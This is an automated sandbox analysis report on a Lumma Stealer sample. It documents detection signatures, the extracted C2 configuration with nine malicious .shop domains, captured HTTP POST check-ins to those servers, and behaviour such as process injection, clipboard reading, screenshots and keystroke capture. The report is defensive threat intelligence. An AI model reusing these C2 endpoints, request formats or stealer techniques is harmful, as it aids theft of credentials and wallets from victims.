Windows Analysis Report
iq2HxA0SLw.exe

Overview

General Information

Sample name: iq2HxA0SLw.exe
renamed because original name is a hash value
Original sample name: da6f9e46eacbde011e7d9a6e742d05c9.exe
Analysis ID: 1519274
MD5: da6f9e46eacbde011e7d9a6e742d05c9
SHA1: a022be00f60db2721120fbbf2acdd4435e86706a
SHA256: ac4b0d4dbdb661c626eef6c128ab65bbf2de3112dde7ef4d526520d1bae9d29f
Tags: exeuser-abuse_ch
Infos:

Detection

LummaC, Go Injector, LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Go Injector
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Antivirus detection for URL or domain
Source: priooozekw.shop Avira URL Cloud: Label: malware
Source: surroundeocw.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api$& Avira URL Cloud: Label: malware
Source: racedsuitreow.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/xy Avira URL Cloud: Label: malware
Source: covvercilverow.shop Avira URL Cloud: Label: malware
Source: pianoswimen.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api= Avira URL Cloud: Label: malware
Source: abortinoiwiam.shop Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop Avira URL Cloud: Label: malware
Source: deallyharvenw.shop Avira URL Cloud: Label: malware
Found malware configuration
Source: 0.2.iq2HxA0SLw.exe.c0009c2000.6.unpack Malware Configuration Extractor: LummaC {"C2 url": ["racedsuitreow.shop", "priooozekw.shop", "defenddsouneuw.shop", "pianoswimen.shop", "surroundeocw.shop", "abortinoiwiam.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "deallyharvenw.shop"], "Build id": "tLYMe5--rui333"}
Multi AV Scanner detection for submitted file
Source: iq2HxA0SLw.exe ReversingLabs: Detection: 58%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 96.5% probability
Sample uses string decryption to hide its real strings
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: covvercilverow.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: surroundeocw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: abortinoiwiam.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: pumpkinkwquo.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: priooozekw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: deallyharvenw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: defenddsouneuw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: racedsuitreow.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: pianoswimen.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: tLYMe5--rui333
Source: unknown HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: iq2HxA0SLw.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0296D1A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0296D1A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 5_2_0296F860
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_0299FCBC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029AA2AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_0299B3F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029AA310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 5_2_0298A324
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029880AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+60h] 5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [ecx], al 5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 5_2_0298E19C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 5_2_029871F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 5_2_0297B130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, ecx 5_2_02974166
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [edi+029B6029h], 00000000h 5_2_029736C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_029736C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh 5_2_029A8650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, ecx 5_2_0297E669
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 5_2_0298C720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 5_2_0298C720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_02973756
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp dword ptr [029B33A4h] 5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_029904D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_0298E419
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_02987450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp edx 5_2_02988446
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+18h] 5_2_0297F467
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 5_2_029A4590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029A7BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 5_2_02965BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 5_2_029A5B00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_02964B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 5_2_029AAB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 5_2_029A5850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+58h] 5_2_0297590B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 5_2_0298EE86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h 5_2_029AAE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 5_2_029AAE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [esi], 00000000h 5_2_02973F86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_02984FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_02991FE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0298BF1C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], dx 5_2_02980F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+000004B0h] 5_2_0297DCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 5_2_029AACF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 5_2_0298ECF4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then inc edi 5_2_02973C2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, word ptr [esi+eax] 5_2_029A1DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_02988D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_02988D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi] 5_2_0298CD0C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 5_2_029A4D00

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.9:49708 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.9:54044 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49708 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49708 -> 104.21.37.97:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: racedsuitreow.shop
Source: Malware configuration extractor URLs: priooozekw.shop
Source: Malware configuration extractor URLs: defenddsouneuw.shop
Source: Malware configuration extractor URLs: pianoswimen.shop
Source: Malware configuration extractor URLs: surroundeocw.shop
Source: Malware configuration extractor URLs: abortinoiwiam.shop
Source: Malware configuration extractor URLs: pumpkinkwquo.shop
Source: Malware configuration extractor URLs: covvercilverow.shop
Source: Malware configuration extractor URLs: deallyharvenw.shop
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.37.97 104.21.37.97
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: racedsuitreow.shop
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: pianoswimen.shop
Source: global traffic DNS traffic detected: DNS query: racedsuitreow.shop
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: iq2HxA0SLw.exe String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F09000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/api
Source: BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/api$&
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/api=
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/xy
Source: BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862478504.0000000002F81000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49709 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02998800 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_02998800
Contains functionality to read the clipboard data
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02998800 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_02998800
Contains functionality to record screenshots
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02999341 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 5_2_02999341
Installs a raw input device (often for capturing keystrokes)
Source: iq2HxA0SLw.exe, 00000000.00000000.1418035635.00007FF6A92C2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckRegCreateKeyExWRegDeleteValueWmissing address/etc/mdns.allowunknown network is unavailableHanifi_RohingyaPsalter_Pahlavix509usepoliciesinvalid boolean0601021504Z0700non-minimal tagunknown Go typeinvalid padding (no semicolon)alsologtostderrstderrthresholdaccept-encodingaccept-languageAccept-EncodingPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keyheap_idle_bytesstack_sys_bytesmspan_sys_bytesother_sys_bytesprocess_max_fdsduplicated name"UNIMPLEMENTED"InvalidArgumentUnauthenticatedUNAUTHENTICATEDinvalid kind %vCardinality(%d)weak_dependencyextension_rangeproto3_optionalunverified_lazyfeature_supportutf8_validationaggregate_valueedition_removedExcludeClipRectGetEnhMetaFileWGetTextMetricsWPlayEnhMetaFileGdiplusShutdownGetThreadLocaleOleUninitializewglGetCurrentDCDragAcceptFilesCallWindowProcWCreatePopupMenuCreateWindowExWDialogBoxParamWGetActiveWindowGetDpiForWindowGetRawInputDataInsertMenuItemWIsWindowEnabledPostQuitMessageSetActiveWindowSetWinEventHookTrackMouseEventWindowFromPointDrawThemeTextExmodulus by zerogetMillisecondsGroup: bad kindempty signature not a functionreflectlite.Setjstmpllitinterptarinsecurepathzipinsecurepathinvalid pointerBelowExactAboveResponseTimeoutMissingEndpoint#multipartfilesAccept-LanguageX-Forwarded-For()<>@,;:\"/[]?=GAUGE_HISTOGRAMAuthInfo is nilAuthInfo: <nil>15:04:05.000000/debug/requestsCLSIDFromProgIDStringFromCLSIDTLS_VERSION_1_0TLS_VERSION_1_1TLS_VERSION_1_2TLS_VERSION_1_3unclosed actionno dot in fieldtemplate clauseEurope (Zurich)Europe (London)access-analyzerapi.iotwirelessapi.mediatailorarc-zonal-shiftcloudcontrolapicloudtrail-datadata.mediastorefips-af-south-1fips-ap-south-1fips-ap-south-2fips-eu-north-1fips-eu-south-1fips-eu-south-2fips-me-south-1aws-marketplaceaws-global-fipsinternetmonitordata-ap-south-1af-south-1-fipsap-south-1-fipsap-south-2-fipseu-north-1-fipseu-south-1-fipseu-south-2-fipsme-south-1-fipslicense-managermachinelearningmessaging-chimemobileanalyticsmturk-requesterfips-aws-globalmobiletargetingresource-groupsroute53resolverwellarchitectedui-ca-central-1ui-eu-central-1China (Beijing)China (Ningxia)fips-cn-north-1data-cn-north-1avx512vpopcntdqcontenteditablehtml/template: NO_SIDE_EFFECTSLEGACY_REQUIREDLENGTH_PREFIXEDDiacriticalDot;DoubleRightTee;DownLeftVector;GreaterGreater;HorizontalLine;InvisibleComma;InvisibleTimes;LeftDownVector;LeftRightArrow;Leftrightarrow;LessSlantEqual;LongRightArrow;Longrightarrow;LowerLeftArrow;NestedLessLess;NotGreaterLess;NotLessGreater;NotSubsetEqual;NotVerticalBar;OpenCurlyQuote;ReverseElement;RightTeeVector;RightVectorBar;ShortDownArrow;ShortLeftArrow;SquareSuperset;TildeFullEqual;UpperLeftArrow;ZeroWidthSpace;curvearrowleft;doublebarwedge;downdownarrows;hookrightarrow;leftleftarrows;leftrightarrow;leftthreetimes;longrightarrow;looparrowright;nshortparallel;ntriangleright;rightarrowtail;rightharpoonup;trianglelefteq;upharpoonright;Co memstr_477571fa-d

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Detected potential crypto function
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A0161 5_2_029A0161
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02970770 5_2_02970770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029AB280 5_2_029AB280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029AA2AE 5_2_029AA2AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02969230 5_2_02969230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296139D 5_2_0296139D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029673F0 5_2_029673F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298A324 5_2_0298A324
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296135B 5_2_0296135B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0297037F 5_2_0297037F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02965360 5_2_02965360
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029880AF 5_2_029880AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A90F0 5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02961000 5_2_02961000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02967030 5_2_02967030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02993024 5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298E19C 5_2_0298E19C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A97BB 5_2_029A97BB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029687C0 5_2_029687C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298E740 5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02963770 5_2_02963770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02983770 5_2_02983770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296A480 5_2_0296A480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0298E419 5_2_0298E419
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02988446 5_2_02988446
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0297F467 5_2_0297F467
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_0296B460 5_2_0296B460
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A0580 5_2_029A0580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029985A0 5_2_029985A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02996A80 5_2_02996A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A7BB0 5_2_029A7BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_029A8BE0 5_2_029A8BE0
